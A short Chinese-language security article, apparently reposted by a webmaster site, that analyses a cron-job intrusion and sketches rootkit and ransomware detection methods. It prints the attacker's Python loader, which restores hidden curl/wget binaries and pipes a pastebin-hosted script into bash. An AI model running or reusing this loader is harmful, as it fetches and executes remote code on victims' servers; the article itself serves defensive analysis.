态势感知——服务器安全策略探索

我们先看一个入侵案例，以下脚本是用户放到定时任务中的经过base64加密的脚本，通过替换curl、wget实现进程网络通讯隐藏的目的。

import os 
import os.path 
 
def GetDeps(): 
 
   if os.path.isfile('/usr/bin/url'): 
        os.system("mv /usr/bin/url /usr/bin/curl") 
        os.system("chmod 777 /usr/bin/curl") 
        os.system("chmod +x /usr/bin/curl") 
 
    if os.path.isfile('/usr/bin/get'): 
        os.system("mv /usr/bin/get /usr/bin/wget") 
        os.system("chmod 777 /usr/bin/wget") 
        os.system("chmod +x /usr/bin/wget") 
 
    if not os.path.isfile('/usr/bin/wget'): 
        os.system("yum clean all") 
        os.system("yum -y install wget") 
        os.system("apt-get update") 
        os.system("apt-get -y install wget") 
 
    if not os.path.isfile('/usr/bin/curl'): 
        os.system("yum clean all") 
        os.system("yum -y install curl") 
        os.system("apt-get update") 
        os.system("apt-get -y install wget") 
 
if os.getuid()==0: 
    GetDeps() 
os.system("(curl -fsSL https://pastebin.com/raw/JuBCmASZ||wget -q -O- https://pastebin.com/raw/JuBCmASZ)|bash%7Cbash)") 

由于存在我们安装的服务器以前中过rootkit程序的情况。

检测流程

1、需要从远程下载wgetcurlpslsnetstatss等网络和文件检测工具

2、与本地对应的文件做对比检测找到diff。

3、如果存在Diff，证明存在rootkit的恶意行为，告警。

• 勒索软件

检测思路：

1、上传文件创建基础数据信息、上传进程快照信息。

2、统计平时文件创建数据，设置动态基础数据基线。

3、如果单台服务器创建量超出平时2倍以上，需要把对应的文件上传到云查杀分析，如果发现勒索软件病毒标签告警。

0x03、总结

服务器安全检测是一项非常繁琐，并且特殊情况比较多的工作，需要这些检测规则和手段自动化成威胁模型。同时，人工threat huning结果也要不断加入，形成正向反馈，良性循环。

（编辑：晋中站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!